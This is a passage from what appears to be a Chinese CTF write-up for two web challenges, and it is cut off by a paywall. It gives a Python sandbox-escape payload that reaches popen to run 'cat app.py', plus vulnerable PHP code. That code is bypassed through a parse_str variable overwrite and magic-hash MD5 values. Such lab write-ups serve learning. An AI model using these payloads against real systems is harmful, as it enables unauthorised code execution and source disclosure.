战队:D0sec
队员:xiaolaisec
WEB
菜狗工具#1
删除JS里的disable让运行键可点击
Exp:print(''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read()
ezPHP
<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
$a = 'O.U.C';
$query = $_SERVER['QUERY_STRING']; //获取GET传递的参数名和值
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
die('听说你是黑客');
}
echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
//这里要用$_SERVER['QUERY_STRING']全局变量覆盖变量a的值,
因为md5('O.U.C')不是0e开头无法md5爆破,(妹的爆破了一个下午才意识到这点
?a=s878926199a&b=s155964671a 覆盖a的值找两个md5若相等的值即可
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
